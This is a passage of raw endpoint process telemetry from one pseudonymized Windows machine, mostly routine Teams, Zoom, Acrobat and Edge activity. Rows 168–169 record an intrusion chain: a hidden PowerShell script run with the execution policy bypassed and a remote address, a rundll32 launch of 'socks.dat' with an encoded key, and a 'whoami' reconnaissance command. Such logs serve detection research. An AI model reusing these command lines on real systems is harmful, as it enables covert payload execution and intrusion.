10:59:43.272397500+00:00,12256,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:01:45.405500800+00:00,2021-06-24 11:03:01.254012500+00:00,2ddb73db-c2bd-49ec-b19e-f8ab191b50a8,computerpii_0a470890c60768167990033d701e7bd881398861,179807,False,10.7740.19041.1052,False,11540474045177893,,11540474045177957,2021-06-24 10:59:44.456855700+00:00,1656,2021-06-24 10:59:44.456855700+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1656,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,20481.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+160,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:01:48.271100700+00:00,8328,OneDriveStandaloneUpdater.exe,OneDriveStandaloneUpdater.exe,PortableExecutable,2020-11-11 01:00:55.277380500+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe,2819968,29aee9be2b2db3dcd74edd0b4edad485,9642cb121af77104ea4605f8ca1ebe5a1defb3192b8778eb544f5bffc1c2f03e,e91c66460a0a34f51b6f27b0f6cac0c44ceec011,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:01:48.828038400+00:00,2021-06-24 11:03:01.254507600+00:00,fd88adfa-2020-463c-add6-f731edfcef72,computerpii_0a470890c60768167990033d701e7bd881398861,179821,False,10.7740.19041.1052,False,11540474045136925,,11540474045177958,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,465521635,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft OneDrive,21.099.0516.0003,OneDriveStandaloneUpdater.exe,OneDriveStandaloneUpdater.exe,Standalone Updater
+161,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:01:50.370402800+00:00,14012,FullTrustNotifier.exe,"""FullTrustNotifier.exe"" GetChannelUri",PortableExecutable,2020-10-22 07:42:28+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\FullTrustNotifier.exe,218608,5236a3cd1fc50ea204f57c9f66787dc6,79f2749d62da14edd4b797d0af539e996841c237795932c299b847bb7d2cd159,ba01717f097852cd19729f5e3146076d12bcc5c7,77b989aab779490036bd3e4726bbef86,59c90ae4846f8e491c2a5aca0ac32e17e275a7f5beb5e3ac7aa09546e760cc45,77e0aac688d8e540f63fd490473b2570587a5ba4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:45.169664700+00:00,15720,AdobeCollabSync.exe,"""AdobeCollabSync.exe""  --type=collab-renderer --proc=16168",False,2021-06-24 10:59:45.109343700+00:00,16168,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:01:50.579619500+00:00,2021-06-24 11:03:01.254827800+00:00,d2772a7a-b90c-4d85-a490-552ab554e02a,computerpii_0a470890c60768167990033d701e7bd881398861,179830,False,10.7740.19041.1052,False,11540474045177895,,11540474045177959,2021-06-24 10:59:45.169664700+00:00,15720,2021-06-24 10:59:45.169664700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe,15720,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,5549280,2021-05-28 03:22:03+00:00,2021-05-28 05:59:00+00:00,2021-06-24 10:59:45.170367400+00:00,2021-05-28 05:59:00+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+162,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:01:51.201003700+00:00,4152,FullTrustNotifier.exe,"""FullTrustNotifier.exe"" SetDeviceId did=""fd2d6ee4-7db5-4f8e-92e8-cc9cfc449a55""",PortableExecutable,2020-10-22 07:42:28+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\FullTrustNotifier.exe,218608,5236a3cd1fc50ea204f57c9f66787dc6,79f2749d62da14edd4b797d0af539e996841c237795932c299b847bb7d2cd159,ba01717f097852cd19729f5e3146076d12bcc5c7,77b989aab779490036bd3e4726bbef86,59c90ae4846f8e491c2a5aca0ac32e17e275a7f5beb5e3ac7aa09546e760cc45,77e0aac688d8e540f63fd490473b2570587a5ba4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:45.169664700+00:00,15720,AdobeCollabSync.exe,"""AdobeCollabSync.exe""  --type=collab-renderer --proc=16168",False,2021-06-24 10:59:45.109343700+00:00,16168,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:01:51.860526400+00:00,2021-06-24 11:03:01.254934900+00:00,48b7d6d6-57bc-42ae-abfe-6fd01cea9304,computerpii_0a470890c60768167990033d701e7bd881398861,179833,False,10.7740.19041.1052,False,11540474045177895,,11540474045177961,2021-06-24 10:59:45.169664700+00:00,15720,2021-06-24 10:59:45.169664700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe,15720,2176,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,5549280,2021-05-28 03:22:03+00:00,2021-05-28 05:59:00+00:00,2021-06-24 10:59:45.170367400+00:00,2021-05-28 05:59:00+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+163,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:01:55.154511500+00:00,9712,CptHost.exe,"-event 00001080 -pid 15976 -evtname cpthost.exe15976-41-0F698A40 -exitevent 00001084 -exitevtname cpthost.exe15976_rpcexit-41-0F698A40 -user_path ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Zoom""",PortableExecutable,2021-05-31 03:58:55.870674300+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Zoom\bin\CptHost.exe,642856,56866774a299abb79709d8209d880ccd,89e0097996d1a3cf551250af8b635ec0d4e79e47db3d096d19412f1021a19425,3c5dfc3583d17e305aa21d19e37eca56d218a9a9,a5f51104ade430c5c5e0e2cf9fc3ccf6,89b22f541ab086dd9095dffd776cbe03d935dd5c0c8603da6651f4d947a6ae00,1d95d4ad2a8e8988a1cdfd43c08444b8ab5ad9ae,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 11:01:45.064176100+00:00,15976,Zoom.exe,"""Zoom.exe""  --action=reconnect --runaszvideo=TRUE ",False,2021-06-24 11:01:19.317436400+00:00,10916,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Zoom\bin\Zoom.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:01:55.500881400+00:00,2021-06-24 11:03:01.255529500+00:00,0eeeecdd-f21e-4edd-89a1-e1c06ada74ec,computerpii_0a470890c60768167990033d701e7bd881398861,179850,False,10.7740.19041.1052,False,11540474045177956,,11540474045177963,2021-06-24 11:01:45.064176100+00:00,15976,2021-06-24 11:01:45.064176100+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Zoom\bin\Zoom.exe,15976,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Zoom\bin,265512,2021-05-24 12:23:32+00:00,2021-05-31 03:58:55.590307100+00:00,2021-06-24 11:01:19.343238+00:00,2021-05-31 03:58:56.891511300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Zoom Video Communications, Inc.",Zoom,"5,6,6,961",Zoom,Zoom,Zoom Meetings,"Zoom Video Communications, Inc.",Zoom Video Call,"5,6,6,961",CptHost.exe,CptHost.exe,Zoom Sharing Host
+164,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 09:46:19.094121200+00:00,3964,svchost.exe,svchost.exe -k wsappx -p -s AppXSvc,PortableExecutable,2020-10-09 20:47:23.714846100+00:00,C:\Windows\System32\svchost.exe,57360,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 09:46:19.167834300+00:00,2021-06-24 09:48:40.226934+00:00,76cf91cd-dfaf-494a-884c-9ca13ba8bb37,computerpii_0a470890c60768167990033d701e7bd881398861,178620,False,10.7740.19041.1052,False,11540474045136906,,11540474045177691,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services
+165,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:36:48.772074700+00:00,14476,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8580 /prefetch:8",PortableExecutable,2021-06-18 23:49:38.664048500+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.54\identity_helper.exe,1080720,33098278b86f6e967f5e0f66da8192fa,dbe0ea072c1e26f07ae34f6b721074635048644ef14fce622e4097f05b6684c2,c345ea4721c3bafc8f7592f97f0407541b464904,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:36:49.772624600+00:00,2021-06-23 01:37:55.590712+00:00,491da89b-5495-434d-9695-0c6e7bd53ffe,computerpii_0a470890c60768167990033d701e7bd881398861,158861,False,10.7740.19041.1052,False,11540474045171833,,11540474045172504,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,20024,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.54,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+166,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 09:18:14.989709+00:00,11208,svchost.exe,svchost.exe -k LocalServiceNetworkRestricted -p -s SmsRouter,PortableExecutable,2020-10-09 20:47:23.714846100+00:00,C:\Windows\System32\svchost.exe,57360,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 09:18:15.087194300+00:00,2021-06-23 09:19:08.336819500+00:00,ddb852e6-595f-4667-9201-e8bb97aca620,computerpii_0a470890c60768167990033d701e7bd881398861,166120,False,10.7740.19041.1052,False,11540474045136906,,11540474045174623,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services
+167,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 09:21:40.602297100+00:00,20060,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UWEMRD7K\FilePII_fe3515c114f7dbae11088419beba8fb8bf0833a3.pdf""",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,3796704,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,553bf7f8c0e762a4c89b34bc6a1e8472,40d1ffbfc08e1c8fdbf1424840b87dc7f6b64cd8ab495a498aaf8cb0df715dc9,222ef0a57b2bb0eab87583daa000f1c8bca664b9,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:43.564026600+00:00,16176,OUTLOOK.EXE,"""OUTLOOK.EXE"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 09:21:40.770199900+00:00,2021-06-23 09:21:48.041062100+00:00,eaf70568-eddd-491d-8b37-b171c7d5c441,computerpii_0a470890c60768167990033d701e7bd881398861,166225,False,10.7740.19041.1052,False,11540474045171845,,11540474045174646,2021-06-23 00:51:43.564026600+00:00,16176,2021-06-23 00:51:43.564026600+00:00,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,16176,2176,ActiveProcessStartkey,C:\Program Files\Microsoft Office\root\Office16,41367344,2021-06-03 12:43:37+00:00,2021-06-12 08:57:23.589811200+00:00,2021-06-23 00:51:43.826220200+00:00,2021-06-12 08:57:23.540503500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,0.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft Outlook,16.0.13801.20738,Outlook,Outlook.exe,Microsoft Outlook,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC
+168,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:14:29.844176700+00:00,13028,rundll32.exe,"""rundll32.exe"" C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==",PortableExecutable,2021-02-17 04:35:14.391957+00:00,C:\Windows\System32\rundll32.exe,71680,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:12:10.599816700+00:00,18532,powershell.exe,"""powershell.exe"" -w Hidden -ep Bypass -file ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_4af465eb4ec83ac8e168ff1d34590ffde46406b7.ps1"" Ipv4PII_34efea060f868c5f5bc11a7a04255476d926f4b7/ss 238262471",False,2021-06-23 03:08:20.325598500+00:00,3840,wscript.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:14:30.509396700+00:00,2021-06-23 03:16:43.470122500+00:00,d43cb4a1-4fda-495f-abba-febe42aec6f4,computerpii_0a470890c60768167990033d701e7bd881398861,161179,False,10.7740.19041.1052,False,11540474045173010,,11540474045173018,2021-06-23 03:12:10.599816700+00:00,18532,2021-06-23 03:12:10.599816700+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,18532,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 03:12:10.688732+00:00,2020-10-09 20:48:24.470101200+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,0.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32)
+169,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:15:13.373323900+00:00,6036,cmd.exe,"""cmd.exe"" /c ""whoami""",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:14:29.844176700+00:00,13028,rundll32.exe,"""rundll32.exe"" C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==",False,2021-06-23 03:12:10.599816700+00:00,18532,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:15:13.539950500+00:00,2021-06-23 03:16:43.470637+00:00,34ef5789-e4df-4514-b7df-c0ca1f118f54,computerpii_0a470890c60768167990033d701e7bd881398861,161197,False,10.7740.19041.1052,False,11540474045173018,,11540474045173021,2021-06-23 03:14:29.844176700+00:00,13028,2021-06-23 03:14:29.844176700+00:00,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,13028,18560,ActiveProcessStartkey,C:\Windows\System32,71680,2103-08-07 22:53:31+00:00,2021-02-17 04:35:14.392957300+00:00,2021-06-23 03:14:30.370328400+00:00,2021-02-17 